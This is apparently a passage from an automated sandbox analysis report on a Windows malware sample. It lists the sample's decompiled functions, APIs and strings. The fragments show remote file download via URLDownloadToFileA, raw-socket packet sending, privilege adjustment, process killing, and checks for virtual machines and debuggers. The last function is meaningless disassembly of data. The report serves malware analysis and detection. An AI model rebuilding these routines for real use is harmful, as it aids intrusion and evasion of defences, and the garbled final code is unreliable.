					if(_t57 != 0) {
						_v100 = 0;
						_v104 = _a8;
						_v108 = _a4;
						_t60 = _v36;
						_v112 = _t60;
						L0040C4B8();
						_t89 = _t88 - 0x10;
						if(_t60 != 0) {
							_v40 = 4;
							_v112 = 0;
							_v116 =  &_v40;
							_v120 =  &_v44;
							_v124 = 4;
							_v128 = _v36;
							L0040C4D0();
							_t90 = _t89 - 0x14;
							_v132 = 0;
							_v136 =  &_v44;
							_v140 =  &_v28;
							_v144 = 2;
							 *_t90 = _v36;
							L0040C4D0();
							_v168 = _v36;
							L0040C4C0();
							_v168 = 0;
							CryptReleaseContext(_v32);
							_t93 = _t90 - 8;
							_t82 = 0;
							if(0 < _v44) {
								do {
									_v168 =  *( &_v28 + _t82) & 0x000000ff;
									_v172 = "%2.2x";
									 *_t93 = _t76 + _t82 * 2;
									sprintf(??, ??);
									_t82 = _t82 + 1;
								} while (_t82 < _v44);
							}
							_t79 = 1;
						} else {
							_v128 = _v36;
							L0040C4C0();
							_v128 = 0;
							CryptReleaseContext(_v32);
							_t79 = 0;
						}
					}
				}
				return _t79;
			}

0x00404484
0x0040448a
0x00404495
0x00404497
0x0040449f
0x004044a7
0x004044af
0x004044bd
0x004044c2
0x004044c5
0x004044cc
0x004044d5
0x004044d9
0x004044e1
0x004044e9
0x004044f1
0x004044f4
0x004044f7
0x004044fc
0x004044ff
0x00404506
0x0040450c
0x00404517
0x0040451e
0x00404522
0x00404525
0x00404528
0x0040452d
0x00404532
0x00404562
0x00404569
0x00404574
0x0040457b
0x0040457f
0x0040458a
0x0040458d
0x00404592
0x00404595
0x004045a0
0x004045a7
0x004045ab
0x004045b6
0x004045b9
0x004045c4
0x004045c7
0x004045cf
0x004045dd
0x004045e2
0x004045e5
0x004045ed
0x004045ef
0x004045f4
0x004045f8
0x00404603
0x00404606
0x0040460b
0x0040460c
0x004045ef
0x00404611
0x00404534
0x00404537
0x0040453a
0x00404542
0x00404550
0x00404558
0x00404558
0x00404532
0x00404506
0x0040461e

APIs

CryptAcquireContextA.ADVAPI32 ref: 004044BD
CryptCreateHash.ADVAPI32 ref: 004044F7
CryptHashData.ADVAPI32 ref: 00404528
CryptDestroyHash.ADVAPI32 ref: 0040453A
CryptReleaseContext.ADVAPI32 ref: 00404550
CryptGetHashParam.ADVAPI32 ref: 0040458D
CryptGetHashParam.ADVAPI32 ref: 004045B9
CryptDestroyHash.ADVAPI32 ref: 004045C7
CryptReleaseContext.ADVAPI32 ref: 004045DD
sprintf.MSVCRT ref: 00404606

Strings

%2.2x, xrefs: 004045F8

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Crypt$Hash$Context$DestroyParamRelease$AcquireCreateDatasprintf
String ID: %2.2x
API String ID: 3563044075-341615062
Opcode ID: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
Instruction ID: 71e90cb579b3012189f1bc8fcce2ad08a11f5a443b18af0431ecfa41047fce4e
Opcode Fuzzy Hash: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
Instruction Fuzzy Hash: 6A41A6B5904309DBDB00EF69C58579EBBF4BB84314F00892EE984A7381E779D548CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 00406BEA Relevance: 18.1, APIs: 12, Instructions: 148memorysleepnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00406C3F
WSASocketA.WS2_32 ref: 00406C79
setsockopt.WS2_32 ref: 00406CB7
GetProcessHeap.KERNEL32 ref: 00406CD0
RtlAllocateHeap.NTDLL ref: 00406CE8
memset.MSVCRT ref: 00406D1E
GetCurrentProcessId.KERNEL32 ref: 00406D2B
GetTickCount.KERNEL32 ref: 00406D52
Sleep.KERNEL32 ref: 00406D8E
GetTickCount.KERNEL32 ref: 00406DA3
sendto.WS2_32 ref: 00406DEF
Sleep.KERNEL32 ref: 00406E06

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CountHeapProcessSleepTick$AllocateCurrentSocketinet_addrmemsetsendtosetsockopt
String ID:
API String ID: 3025670439-0
Opcode ID: 80d924af3c741b2fe8bc6792d036a4a53eb01d27bfc2d5dfb458dfe8975752fb
Instruction ID: c887a22924d357f2cc4e5641eb84b294b57a756f528ba2f64bcdc76ce2e57ac6
Opcode Fuzzy Hash: 80d924af3c741b2fe8bc6792d036a4a53eb01d27bfc2d5dfb458dfe8975752fb
Instruction Fuzzy Hash: EB5129B09043459BD700EFA8C18439EFBF1BF84314F108A3EE499AB785D7789459CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00407C4E Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 196timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00407E14
CreateThread.KERNEL32 ref: 00408044

Strings

4upyl?idzyt9z~`n%|e~, xrefs: 00407D50
command, xrefs: 00407FE5
p515p225982son69p76q604qp7s97975, xrefs: 00407CB4
2317q129n58non7o3148por15qs741r3, xrefs: 00407CC7
2wrwb=xfpav'g{sm#~gp, xrefs: 00407D04
(ohcx%gmlvl#b|d}m8e|k, xrefs: 00407DEE

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CreateLocalThreadTime
String ID: (ohcx%gmlvl#b|d}m8e|k$2317q129n58non7o3148por15qs741r3$2wrwb=xfpav'g{sm#~gp$4upyl?idzyt9z~`n%|e~$command$p515p225982son69p76q604qp7s97975
API String ID: 3972831565-1317110218
Opcode ID: 5db106fd8fe89164a4683074e62a5a21e238b2b61434d77a43c37ac808585bb6
Instruction ID: 80463a4929d65f88bb62c6d7506587d1b44305c3c58205fc38c9e757c491522e
Opcode Fuzzy Hash: 5db106fd8fe89164a4683074e62a5a21e238b2b61434d77a43c37ac808585bb6
Instruction Fuzzy Hash: F8A1F2B08083199ADB10DF55C5453DEBBF0BB94304F5089AED588A7381D7B89AC9CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00406E1C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58librarysleepfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00406E5C
GetProcAddress.KERNEL32 ref: 00406E79
FreeLibrary.KERNEL32 ref: 00406E8D
DeleteFileA.KERNEL32 ref: 00406EBD
Sleep.KERNEL32 ref: 00406F01

Strings

URLDownloadToFileA, xrefs: 00406E6E
urlmon.dll, xrefs: 00406E55
donzx.dll, xrefs: 00406E9C

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Library$AddressDeleteFileFreeLoadProcSleep
String ID: URLDownloadToFileA$donzx.dll$urlmon.dll
API String ID: 1591209584-4102153241
Opcode ID: 822e4242d846e3181e51de55bcfb4708a5aec733e92b39760985a308414817cb
Instruction ID: 543b2787c70849a237c7d5d5e8862ee058c6e2dedd7614c5b7d168295bf2944d
Opcode Fuzzy Hash: 822e4242d846e3181e51de55bcfb4708a5aec733e92b39760985a308414817cb
Instruction Fuzzy Hash: 1C21FCB09043459BD700EF39D58579ABBF0BB48304F108A7EE98997341E778D998CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405256 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00405272

Strings

fWinS, xrefs: 00405301
f2003, xrefs: 004052D3
fVISta, xrefs: 004052EA
Unk, xrefs: 0040530F
fXp, xrefs: 004052BC
f2000, xrefs: 004052A5

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Version
String ID: Unk$f2000$f2003$fVISta$fWinS$fXp
API String ID: 1889659487-2404033052
Opcode ID: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
Instruction ID: e8bb7547553301c142e519b247f3baff17d1b23cd464d4725f64abea95698485
Opcode Fuzzy Hash: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
Instruction Fuzzy Hash: DD118334A11718CACF34AA18891939B72B0EB93349F4441FBD88979690C3B98DC9CE1B

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00404DFA
OpenProcessToken.ADVAPI32 ref: 00404E11
LookupPrivilegeValueA.ADVAPI32 ref: 00404E36
AdjustTokenPrivileges.ADVAPI32 ref: 00404E89
CloseHandle.KERNEL32 ref: 00404E9E

Strings

(, xrefs: 00404E06

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: (
API String ID: 3038321057-3887548279
Opcode ID: f7190b97f58be1d9d2939eabb058490fe92538849b0e57194ebfcb8a28136c74
Instruction ID: 79319732bb30defa6c9a9f1a6b789a97df9146ac2c859e5e9c71adcb6af8603d
Opcode Fuzzy Hash: f7190b97f58be1d9d2939eabb058490fe92538849b0e57194ebfcb8a28136c74
Instruction Fuzzy Hash: 21119BB4904305DBDB00EF69C18579EBBF4BF44348F00892EE884A7385E779D549CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00404D3A Relevance: 9.1, APIs: 6, Instructions: 51processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00404D58
Process32First.KERNEL32 ref: 00404D79
strcmp.MSVCRT ref: 00404D92
OpenProcess.KERNEL32 ref: 00404DB4
TerminateProcess.KERNEL32 ref: 00404DCB
Process32Next.KERNEL32 ref: 00404DE0

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32strcmp
String ID:
API String ID: 3031566330-0
Opcode ID: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
Instruction ID: 382b25c2ad7d0cef6f391bcc669a6196322adae5fe9b19759f67a92d9b3667d2
Opcode Fuzzy Hash: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
Instruction Fuzzy Hash: 4E1133B18043049AD710BF35D98539EBBF8AF84754F00857EED88A3281E7789958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004060AA Relevance: 7.6, APIs: 5, Instructions: 70memorystringnetworkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI ref: 004060E7
GetProcessHeap.KERNEL32 ref: 0040610A
RtlAllocateHeap.NTDLL ref: 00406122
lstrcpy.KERNEL32 ref: 00406144

Part of subcall function 004013D8: HeapFree.KERNEL32 ref: 00401410

GlobalFree.KERNEL32 ref: 00406182

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Heap$Free$AllocateGlobalProcessQuery_lstrcpy
String ID:
API String ID: 335828720-0
Opcode ID: a388a33b90b2a7703f34e2c123a8a93f25413c95038993b571ca2cebfb53ee2e
Instruction ID: 11d18a1c71fde03939184ec7a539e433b17fdc1711bb96236e21141529c11046
Opcode Fuzzy Hash: a388a33b90b2a7703f34e2c123a8a93f25413c95038993b571ca2cebfb53ee2e
Instruction Fuzzy Hash: 5F2148B09043019BDB00EF65C58476BBBF4BF44354F10893EE894AB382E778D958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00404990 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 004049C7

Strings

vmware, xrefs: 004049A2
qemu, xrefs: 004049A9
vbox, xrefs: 004049B0
virtual, xrefs: 0040499B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: strstr
String ID: qemu$vbox$virtual$vmware
API String ID: 1392478783-2646423876
Opcode ID: c9d4e4dd12de4e295f14a9e62fd40bc20da4a6d1a2aa3fdf2bcdf6fb4d7785e8
Instruction ID: b540962fa618101e36228a8a74583da539d79dad1ba2731ad5b1d3bf9ece319c
Opcode Fuzzy Hash: c9d4e4dd12de4e295f14a9e62fd40bc20da4a6d1a2aa3fdf2bcdf6fb4d7785e8
Instruction Fuzzy Hash: 3DF0A7F4800208CBDB109FA5D8813AF7BA8EB04718F10407ADA54BF7C0D3799D8487D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040814C Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,004083E1), ref: 00408158

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 45992fab59b789b714cf92c72d24a5becac00f776ba7134a840b1a6c57edf9ba
Instruction ID: 62397ccbaa835f3c60518c82b9829302d3b4a44d16c6782a7ba501dc9b29137d
Opcode Fuzzy Hash: 45992fab59b789b714cf92c72d24a5becac00f776ba7134a840b1a6c57edf9ba
Instruction Fuzzy Hash: 58014C60D0452D89DB10EFAEC5451BEB7F2EF48700F408126E890BA288E67C998AD355

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB8 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404AB8() {
				signed char _t3;

				_t3 = 0;
				if(IsDebuggerPresent() != 0) {
					_t3 = 1;
				}
				return _t3 & 0x000000ff;
			}

0x00404abf
0x00404ac8
0x00404aca
0x00404aca
0x00404ad4

APIs

IsDebuggerPresent.KERNEL32(004040B2), ref: 00404AC1

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: e7a5aad3decc5595e0085427251ddfb25943da0c25b2f4dd4e54ea83f630c786
Instruction ID: ae9a913412494098cb72223140141d55c0ad5dcb9cb6441feee08d4656a6771e
Opcode Fuzzy Hash: e7a5aad3decc5595e0085427251ddfb25943da0c25b2f4dd4e54ea83f630c786
Instruction Fuzzy Hash: ACC09BE16D52191D790031A73D43463775C446127AB0C1237ED4D593C1E41FF52851BF

Uniqueness

Uniqueness Score: -1.00%

Function 1000A000 Relevance: .8, Instructions: 811
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E1000A000() {
				signed int* _t108;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				signed char _t124;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed char _t128;
				intOrPtr* _t129;
				signed int* _t133;
				signed char* _t134;
				signed char _t136;
				signed int _t139;
				signed int _t140;
				signed char _t142;
				signed char _t143;
				signed char _t144;
				signed char _t146;
				void* _t147;
				signed char _t148;
				signed int _t149;
				signed int* _t150;
				signed int _t151;
				unsigned char* _t152;
				signed int _t153;
				signed int _t155;
				void* _t156;
				signed int _t163;
				signed int* _t164;
				signed int* _t165;
				signed int* _t168;
				signed int* _t169;
				signed int* _t171;
				signed int _t172;
				signed int* _t176;
				signed int _t177;
				signed int* _t178;
				signed int* _t179;
				signed int* _t183;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				void* _t191;
				signed int _t192;
				signed int _t193;
				intOrPtr _t195;
				void* _t196;
				intOrPtr _t200;
				signed int* _t201;
				signed int* _t202;
				intOrPtr _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t211;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t223;
				signed int _t225;
				void* _t226;
				signed char _t228;
				intOrPtr _t230;
				intOrPtr _t231;
				intOrPtr _t234;
				void* _t250;
				signed long long _t260;

				_t107 = 0;
				 *0 =  *0;
				 *_t134 =  *_t134 << 1;
				 *_t134 =  *_t134;
				_t136 =  &(_t134[2]);
				if(_t136 == 0) {
					L17:
					if(_t168 == 0) {
						L38:
						asm("arpl [gs:edi+ebp*2+0x72], si");
						if(_t177 >= 0) {
							L53:
							asm("popad");
							asm("insb");
							_t151 = _t151 + 1;
							_t186 = _t151;
							L54:
							if(_t186 < 0) {
								asm("gs outsb");
								_t136 = _t136 + 1;
								 *_t107 =  *_t107 + _t107;
								_t153 = 0xb4000000;
								if ( *_t107 >= 0) goto L82;
								 *_t136 =  *_t136 + _t107;
								_push(_t148);
								asm("a16 inc ebx");
								asm("insb");
								asm("outsd");
								if( *_t136 >= 0) {
									L113:
									_pop(_t150);
									L114:
									_t153 = _t150[0x18] * 0x62610100;
									_t211 = _t153;
									asm("outsd");
									if(_t211 < 0) {
										if(_t226 == 0) {
											L160:
											if(_t234 >= 0) {
												L177:
												_t107 = _t107 ^ _t148;
												 *(_t148 + 0x10) =  *(_t148 + 0x10) ^ _t107;
												asm("adc ebx, [ebp+0x3636361f]");
												ds = ss;
												 *[ss:eax] =  *[ss:eax] - _t136;
												L179:
												 *[ss:eax] =  *[ss:eax] - _t136;
												 *_t107 =  *_t107 - _t136;
												 *_t107 =  *_t107 | _t136;
												 *_t107 =  *_t107 | _t136;
												 *_t107 =  *_t107 | _t136;
												 *_t107 =  *_t107 | _t136;
												 *_t107 =  *_t107 | _t136;
												asm("adc [0xa1b190b], ecx");
												asm("adc [ebx], ecx");
												asm("sbb [0x1206180b], edx");
												asm("das");
												asm("aaa");
												asm("adc al, 0x5");
												_push(cs);
												asm("das");
												asm("sbb [ecx], bl");
												_push(ss);
												_push(ss);
												asm("invd");
												 *_t107 =  *_t107 | _t136;
												asm("wbinvd");
												 *_t133 =  *_t133 | _t148;
												_t108 = _t107 + 0xb0b0b2b;
												_t139 = _t136 |  *0xc050c41 |  *_t133 |  *_t108;
												_t149 = _t148 |  *_t133;
												 *_t133 =  *_t133 & _t149;
												 *_t108 =  *_t108 | _t139;
												_t152 = _t151 - 1;
												asm("adc [edi], bl");
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												 *_t108 =  *_t108 | _t139;
												asm("sbb dh, al");
												_t121 =  &(_t108[0xe]);
												 *((intOrPtr*)(_t121 + 0x45)) =  *((intOrPtr*)(_t121 + 0x45)) + _t149;
												 *_t121 =  *_t121 + _t121;
												_t156 = _t155 - 1;
												 *_t150 =  *_t150 + _t121;
												_t133[0x12fd3f] = _t133 + _t133[0x12fd3f];
												 *_t121 =  *_t121 + _t121;
												 *_t121 =  *_t121 + _t121;
												 *_t121 =  *_t121 + _t121;
												_t122 = _t121 + _t121;
												 *_t152 =  *_t152 + _t139;
												_t140 = _t139 &  *_t133;
												 *_t149 =  *_t149 + _t122;
												 *_t122 =  *_t122 - _t122;
												 *_t122 =  *_t122 + _t122;
												 *_t122 =  *_t122 + _t122;
												_t123 = _t122 +  *_t122;
												 *((intOrPtr*)(_t123 + 0x10)) =  *((intOrPtr*)(_t123 + 0x10)) + _t123;
												 *_t123 =  *_t123 + _t123;
												 *_t123 =  *_t123 + _t149;
												 *_t123 =  *_t123 + _t123;
												 *_t123 =  *_t123 + _t123;
												 *_t123 =  *_t123 + _t123;
												 *_t123 =  *_t123 + _t123;
												asm("adc [eax], al");
												asm("adc [eax], al");
												 *_t123 =  *_t123 + _t123;
												_t124 = _t123 +  *_t123;
												 *((intOrPtr*)(_t124 + _t124)) =  *((intOrPtr*)(_t124 + _t124)) + _t124;
												 *_t124 =  *_t124 + _t124;
												 *_t124 =  *_t124 + _t124;
												 *_t124 =  *_t124 + _t124;
												_t125 = _t124;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *((intOrPtr*)(_t125 + 0x4000000)) =  *((intOrPtr*)(_t125 + 0x4000000)) + _t125;
												 *_t125 =  *_t125 + _t125;
												asm("pcmpeqd mm0, [eax]");
												 *_t133 =  *_t133 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												asm("adc [eax], al");
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t149;
												 *_t125 =  *_t125 + _t125;
												asm("adc [eax], al");
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t149;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												if ( *_t125 < 0) goto L181;
												 *((intOrPtr*)(_t125 + 3)) =  *((intOrPtr*)(_t125 + 3)) + _t125;
												 *_t125 =  *_t125 + _t125;
												 *((intOrPtr*)(_t125 + 0x72c0000)) =  *((intOrPtr*)(_t125 + 0x72c0000)) + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *((intOrPtr*)(_t125 + 0x1dc0000)) =  *((intOrPtr*)(_t125 + 0x1dc0000)) + _t149;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
												 *_t125 =  *_t125 + _t125;
